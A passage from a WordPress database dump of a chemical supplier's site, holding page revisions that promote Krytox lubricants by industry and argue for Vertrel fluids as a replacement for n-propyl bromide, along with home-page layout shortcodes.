<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<a name="elec"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Electronics/Semiconductor</strong></span>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<a name="food"></a>\r\n\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Food Processing</strong></span>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<a name="med"></a>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Medical Industry Equipment Applications </strong></span>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<a name="metal"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Metal Processing </strong></span>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n<a name="oxy"></a>\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Oxygen and Reactive Gas Service </strong></span>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<a name="power"></a>\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Power Generation</strong></span>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<a name="pulp"></a>\r\n\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Pulp and Paper</strong></span>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<a name="text"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Textile</strong></span>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<a name="tire"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Tire Mold</strong></span>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]\r\n\r\n&nbsp;\r\n\r\nTo see our entire line of Krytox products please visit: <a href="https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/">https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/</a>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 19:14:23', '2016-09-29 19:14:23', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2191, 21, '2016-09-29 21:58:52', '2016-09-29 21:58:52', '', '', '', 'publish', 'closed', 'closed', '', '2191', '', '', '2016-09-29 21:58:52', '2016-09-29 21:58:52', '', 0, 'https://www.miller-stephenson.com/nf_sub/2191/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2192, 22, '2016-09-30 04:26:02', '2016-09-30 04:26:02', '', '', '', 'publish', 'closed', 'closed', '', '2192', '', '', '2016-09-30 04:26:02', '2016-09-30 04:26:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/2192/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2193, 1, '2016-09-30 11:48:31', '2016-09-30 11:48:31', 'Why Vertrel fluids are a suitable replacement for nPB?<BR><BR>\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\n\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons Vertrel is an excellent replacement for nPB:\n<ol>\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\n</ol>\n<strong>Summary</strong>\n\nVertrel specialty fluids have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB.\n\n<img src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" class="alignnone size-full wp-image-2002" />\n', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-autosave-v1', '', '', '2016-09-30 11:48:31', '2016-09-30 11:48:31', '', 1121, 'https://www.miller-stephenson.com/1121-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2194, 1, '2016-09-30 11:47:27', '2016-09-30 11:47:27', 'Why Vertrel fluids are a suitable replacement for nPB?<BR><BR>\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons Vertrel is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> Vertrel specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel specialty fluids have similar solvency strength as nPB. Vertrel is non-flammable, safe, and requires no stabilizers, making Vertrel an ideal replacement for nPB.\r\n\r\n<img src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" class="alignnone size-full wp-image-2002" />\r\n', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-09-30 11:47:27', '2016-09-30 11:47:27', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2195, 1, '2016-09-30 11:48:59', '2016-09-30 11:48:59', 'Why Vertrel fluids are a suitable replacement for nPB?<BR><BR>\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel specialty fluids have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB.\r\n\r\n<img src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" class="alignnone size-full wp-image-2002" />\r\n', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-09-30 11:48:59', '2016-09-30 11:48:59', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2196, 1, '2016-09-30 12:53:45', '2016-09-30 12:53:45', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n[col span="3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col][col span="3"]\r\n<h3>Large Inventory</h3>\r\nWith four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.\r\n\r\n[/col]\r\n\r\n[col span="3"]\r\n<h3>Low Global Warming</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-30 12:53:45', '2016-09-30 12:53:45', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2198, 23, '2016-09-30 13:28:31', '2016-09-30 13:28:31', '', '', '', 'publish', 'closed', 'closed', '', '2198', '', '', '2016-09-30 13:28:31', '2016-09-30 13:28:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/2198/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2201, 2, '2016-09-30 13:32:21', '2016-09-30 13:32:21', '', 'vertrel', '', 'inherit', 'closed', 'closed', '', 'vertrel-3', '', '', '2016-09-30 13:32:21', '2016-09-30 13:32:21', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2202, 2, '2016-09-30 13:32:26', '2016-09-30 13:32:26', '', 'finish-line', '', 'inherit', 'closed', 'closed', '', 'finish-line-2', '', '', '2016-09-30 13:32:26', '2016-09-30 13:32:26', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/finish-line.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2203, 2, '2016-09-30 13:33:40', '2016-09-30 13:33:40', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col 